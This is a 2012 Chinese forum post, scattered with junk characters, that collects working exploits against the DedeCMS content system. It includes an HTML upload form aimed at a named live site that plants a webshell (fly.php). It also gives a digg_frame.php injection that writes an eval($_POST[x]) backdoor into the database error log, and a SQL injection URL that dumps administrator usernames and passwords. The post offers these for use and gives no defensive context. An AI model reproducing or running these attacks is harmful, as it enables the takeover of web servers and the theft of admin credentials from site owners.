/ r$ Q. M; C9 T J; \. e织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
) q4 O3 p: O( u, Q$ `<html>
: G: D& e: Q4 f- D$ S3 H<head>6 i3 A5 K: J* A2 S2 N* a. q9 X/ q5 f: a
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>7 G% Z: _9 l8 J% G4 J( x
</head>
5 {$ k0 o. S: O/ i1 N+ B7 p<body style="FONT-SIZE: 9pt">+ Y- B E9 e9 ~- j e/ {2 a/ q
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
" r2 e) f5 z5 F- H+ @+ p7 [<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
" s( d* V. X: `$ y. J/ W<input type='hidden' name='activepath' value='/data/cache/' />: F% v* G1 p! `% `$ u, i! L
<input type='hidden' name='cfg_basedir' value='../../' />
& Q. j( m( c; {6 X0 a<input type='hidden' name='cfg_imgtype' value='php' />
/ i3 m& K; p( U) F3 z @6 U! }* U<input type='hidden' name='cfg_not_allowall' value='txt' />7 E5 ?, G( ]& z% y7 g+ L
<input type='hidden' name='cfg_softtype' value='php' />
9 o# \, g( I# Y- W- I. f( @<input type='hidden' name='cfg_mediatype' value='php' />9 ~' \1 g% I, S1 |( ]7 f4 E
<input type='hidden' name='f' value='form1.enclosure' />* b: B A7 P6 ~" k' H
<input type='hidden' name='job' value='upload' />% p& v; t; F: X O* |
<input type='hidden' name='newname' value='fly.php' />
& k$ ]9 `( V+ nSelect U Shell <input type='file' name='uploadfile' size='25' /># h: Q7 f2 e, B9 a
<input type='submit' name='sb1' value='确定' />
3 K, v( i2 \2 Y5 `8 P, m</form>
. W) ?5 W5 e K& k) C<br />It's just a exp for the bug of Dedecms V55...<br />
4 R0 z) K. V" d% s: {Need register_globals = on...<br />4 z9 h# v3 M0 A
Fun the game,get a webshell at /data/cache/fly.php...<br /># G0 ^, e) l, q3 J" }
</body>
. g* e; \5 G2 {+ r% r/ W</html>
v1 \7 o6 p4 m4 U# _: n+ A5 _* g) p0 A; s& {
4 K) g$ k G0 P; k3 q% ]
5 u1 F" e' l% i$ E# y7 V3 q' l# E' F3 I7 |; R6 e& Z
2 f* x( A6 ?: r1 q; s+ S+ B5 f1 k7 h: W9 P, n8 u
7 G* G8 z$ P1 J" k3 r
* w3 j# a/ h, O4 F$ f
2 H; Y7 K4 i8 k. M# Y, h2 ~/ @/ A5 Q$ [; X6 ]0 h% \% l, g
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞. h6 V- L5 Z; O4 e/ D( o
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
4 s0 x5 s- U! w4 y5 b5 J) T1. 访问网址:
. @( `4 y- G5 o+ O# |) l' \http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
9 D) E$ _* x% [% r& B1 z1 @可看见错误信息% h- {5 \7 h7 v' G. S
" v* j! \4 g6 C; d+ o% e% a j$ e
5 D+ ` U* o }' B' l, n( K, O" s0 ~2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。+ w; F: N: u( N: H$ g
int(3) Error: Illegal double '1024e1024' value found during parsing7 W1 L8 {+ X. F ~
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>: \( Y3 \# B% [% A; c f
* w6 o9 E& e% z
8 b+ H0 O, M+ y4 l) k
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
1 ]: ~, ^9 m/ Q. R3 O7 E% p# ^" b
" ~! L3 b5 \' c( ~7 A# B
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>, D5 z" \/ ]4 e8 [5 b! m
; c; U, j; n' a$ Y) A
, ?$ `. {+ F* _2 y7 m: ]按确定后的看到第2步骤的信息表示文件木马上传成功.
0 u' |( `$ D) N0 k1 l" Z) d( @' S }! s5 H
$ `2 j4 m0 \3 s9 R: n
/ b* U1 ~ L; ]/ @2 Y8 t& p' a' G) B7 c1 R# I1 `3 {
! J1 v1 `7 |# j" c/ g Y4 z
* W j' v( X* F6 P" s' r5 i$ i& r, ?2 [2 S- N' n
' }6 N- z5 L- E' W& c
# m1 F7 m- y+ |' t$ a& n
0 ]1 B5 H. l' d6 j6 D) m" G7 x2 L m' B
$ _9 I4 L+ N8 Q. N2 r# Z- ]$ W织梦(DedeCms)plus/infosearch.php 文件注入漏洞% f; @0 d$ S* Q9 }- D$ y" [
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对